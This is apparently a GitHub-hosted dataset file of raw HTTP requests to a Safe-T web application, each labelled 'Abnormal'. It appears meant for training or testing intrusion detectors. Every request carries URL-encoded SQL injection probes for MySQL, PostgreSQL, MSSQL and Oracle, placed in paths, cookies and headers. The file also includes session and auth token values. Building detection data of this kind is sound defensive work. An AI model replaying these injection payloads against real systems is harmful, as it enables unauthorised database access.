-
Notifications
You must be signed in to change notification settings - Fork 88
/
Copy pathabnormal-http-traffic.txt
89 lines (89 loc) · 77.9 KB
/
abnormal-http-traffic.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
POST /Safe-T/default.aspx/getFilesInFolder%27 %29 %20 AND %20 %3D %20 AND %20 %28 %27 %27 %3D %27 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 27Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder%27 %20 AND %20 %3D %20 AND %20 %27 %27 %3D %27 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 27Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent%25 %27 %20 AND %20 %3D %20 AND %20 %27 %25 %27 %3D %27 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
GET //Safe-T/JS/tirLogin.js %20 AND %20 %3D -- %20 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-alive,Abnormal
GET //Safe-T/images/browser_icon.ico%29 %20 AND %20 %28 SELECT %20 %20 FROM %28 SELECT %20 COUNT %28 %2A %29 %2C CONCAT %28 %2C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %2C %2C FLOOR %28 RAND %28 0 %29 %2A2 %29 %29 x %20 FROM %20 INFORMATION_SCHEMA.CHARACTER_SETS %20 GROUP %20 BY %20 x %29 a %29 %20 AND %20 %28 %3D HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-alive,Abnormal
GET //Safe-T/WebSkin/DefaultWebskin/Images/Login/%20 AND %20 %28 SELECT %20 %20 FROM %28 SELECT %20 COUNT %28 %2A %29 %2C CONCAT %28 %2C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %2C %2C FLOOR %28 RAND %28 0 %29 %2A2 %29 %29 x %20 FROM %20 INFORMATION_SCHEMA.CHARACTER_SETS %20 GROUP %20 BY %20 x %29 a %29Lock.png HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: image/pngimage/*;q=0.8*/*;q=0.5Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-alive,Abnormal
POST //Safe-T/login.aspx %27 %29 %20 AND %20 %28 SELECT %20 %20 FROM %28 SELECT %20 COUNT %28 %2A %29 %2C CONCAT %28 %2C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %2C %2C FLOOR %28 RAND %28 0 %29 %2A2 %29 %29 x %20 FROM %20 INFORMATION_SCHEMA.CHARACTER_SETS %20 GROUP %20 BY %20 x %29 a %29 %20 AND %20 %28 %27 %27 %3D %27 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 480,Abnormal
GET //Safe-T/login.aspx%27 %20 AND %20 %28 SELECT %20 %20 FROM %28 SELECT %20 COUNT %28 %2A %29 %2C CONCAT %28 %2C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %2C %2C FLOOR %28 RAND %28 0 %29 %2A2 %29 %29 x %20 FROM %20 INFORMATION_SCHEMA.CHARACTER_SETS %20 GROUP %20 BY %20 x %29 a %29 %20 AND %20 %27 %27 %3D %27 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Style/Login.css%25 %27 %20 AND %20 %28 SELECT %20 %20 FROM %28 SELECT %20 COUNT %28 %2A %29 %2C CONCAT %28 %2C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %2C %2C FLOOR %28 RAND %28 0 %29 %2A2 %29 %29 x %20 FROM %20 INFORMATION_SCHEMA.CHARACTER_SETS %20 GROUP %20 BY %20 x %29 a %29 %20 AND %20 %27 %25 %27 %3D %27 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-aliveIf-Modified-Since: Thu 09 Apr 2015 19:37:28 GMTIf-None-Match: "04cb29cfc72d01:0"Cache-Control: max-age=0,Abnormal
GET //Safe-T/JS/tirBase64.js%20 AND %20 %28 SELECT %20 %20 FROM %28 SELECT %20 COUNT %28 %2A %29 %2C CONCAT %28 %2C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %2C %2C FLOOR %28 RAND %28 0 %29 %2A2 %29 %29 x %20 FROM %20 INFORMATION_SCHEMA.CHARACTER_SETS %20 GROUP %20 BY %20 x %29 a %29 -- %20 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-aliveIf-Modified-Since: Fri 18 Sep 2015 07:11:26 GMTIf-None-Match: "0a3623be1f1d01:0"Cache-Control: max-age=0,Abnormal
GET //Safe-T/JS/%29 %20 AND %20 %3D CAST %28 %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %3A%3Atext%7C%7C %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %20 AS %20 NUMERIC %29 %20 AND %20 %28 %3D/tirLogin.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-aliveIf-Modified-Since: Thu 17 Sep 2015 23:10:22 GMTIf-None-Match: "0c31979ef1d01:0"Cache-Control: max-age=0,Abnormal
GET //Safe-T/WebSkin/DefaultWebskin/%20 AND %20 %3D CAST %28 %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %3A%3Atext%7C%7C %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %20 AS %20 NUMERIC %29/Images/Login/Lock.png HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: image/pngimage/*;q=0.8*/*;q=0.5Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-aliveIf-Modified-Since: Thu 09 Apr 2015 19:37:28 GMTIf-None-Match: "04cb29cfc72d01:0"Cache-Control: max-age=0,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Images/Login/Logo.png%27 %29 %20 AND %20 %3D CAST %28 %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %3A%3Atext%7C%7C %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %20 AS %20 NUMERIC %29 %20 AND %20 %28 %27 %27 %3D % HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: image/pngimage/*;q=0.8*/*;q=0.5Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-aliveIf-Modified-Since: Thu 09 Apr 2015 19:37:28 GMTIf-None-Match: "04cb29cfc72d01:0"Cache-Control: max-age=0,Abnormal
GET /Safe-T/%27 %20 AND %20 %3D CAST %28 %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %3A%3Atext%7C%7C %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %20 AS %20 NUMERIC %29 %20 AND %20 %27 %27 %3D %27/Webskin/DefaultWebskin/Images/Login/bg01.jpg HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: image/pngimage/*;q=0.8*/*;q=0.5Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-aliveIf-Modified-Since: Thu 09 Apr 2015 19:37:28 GMTIf-None-Match: "04cb29cfc72d01:0"Cache-Control: max-age=0,Abnormal
POST //Safe-T/login.aspx%25 %27 %20 AND %20 %3D CAST %28 %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %3A%3Atext%7C%7C %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %20 AS %20 NUMERIC %29 %20 AND %20 %27 %25 %27 %3D %27 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdysConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 482,Abnormal
GET /Safe-T/default.aspx%20 AND %20 %3D CAST %28 %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %3A%3Atext%7C%7C %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %20 AS %20 NUMERIC %29 -- %20 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109//Safe-T/login.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=021A09CF59C8BD641A5ED6EEF81D58420CA9DDF7B6A8F425D35060A638AA7DA932694F9B6B2048813D2FBF6E9098FC4CEAC430274E28F8275BAF7594A60B6DFA89007C954A5DA3D1EF03F26B62A078C181D968C0CBF5B271F6E741E2470EB1724F22FC702108EEE6B0AC0E489945AAEA9C88A7A8CDFBD76441E55C7CD1CCEB1B9904E5FC751F891CC80BF100CA02C070E333A5B15B923C2A4C0C0A8FDCD61A8010A1090D5E9023B8A3C4A9E4E35AE6423198D56720F2C17C95B9821AC1BD5B7C4145668AConnection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Style/Main.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz;%29 %20 AND %20 %3D CONVERT %28 INT %2C %28 SELECT %20 CHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2B %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 CHAR %28 49 %29 %20 ELSE %20 CHAR %28 48 %29 %20 END %29 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %29 %29 %20 AND %20 %28 %3D; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/JS/tirFlash.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys;%20 AND %20 %3D CONVERT %28 INT %2C %28 SELECT %20 CHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2B %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 CHAR %28 49 %29 %20 ELSE %20 CHAR %28 48 %29 %20 END %29 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %29 %29 .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/JS/main.js HTTP/1.1Host: 192.168.4.109User-Agent: %27 %29 %20 AND %20 %3D CONVERT %28 INT %2C %28 SELECT %20 CHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2B %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 CHAR %28 49 %29 %20 ELSE %20 CHAR %28 48 %29 %20 END %29 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %29 %29 %20 AND %20 %28 %27 %27 %3D %27Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/JS/mainPublisher%27 %20 AND %20 %3D CONVERT %28 INT %2C %28 SELECT %20 CHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2B %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 CHAR %28 49 %29 %20 ELSE %20 CHAR %28 48 %29 %20 END %29 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %29 %29 %20 AND %20 %27 %27 %3D %27.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/JS/mainShare.js%25 %27 %20 AND %20 %3D CONVERT %28 INT %2C %28 SELECT %20 CHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2B %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 CHAR %28 49 %29 %20 ELSE %20 CHAR %28 48 %29 %20 END %29 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %29 %29 %20 AND %20 %27 %25 %27 %3D %27 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/JS/mainUpload.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: %20 AND %20 %3D CONVERT %28 INT %2C %28 SELECT %20 CHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2B %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 CHAR %28 49 %29 %20 ELSE %20 CHAR %28 48 %29 %20 END %29 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %29 %29 -- %20en;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/%29 %20 AND %20 %3D %28 SELECT %20 UPPER %28 XMLType %28 CHR %28 60 %29 %7C%7C CHR %28 58 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %20 FROM %20 DUAL %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 62 %29 %29 %29 %20 FROM %20 DUAL %29 %20 AND %20 %28 %3D/DefaultWebskin/PackageSkin/Default/Script/packageScript_filesOnly.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/JS/jquery1.11.0.min.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip%20 AND %20 %3D %28 SELECT %20 UPPER %28 XMLType %28 CHR %28 60 %29 %7C%7C CHR %28 58 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %20 FROM %20 DUAL %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 62 %29 %29 %29 %20 FROM %20 DUAL %29 deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
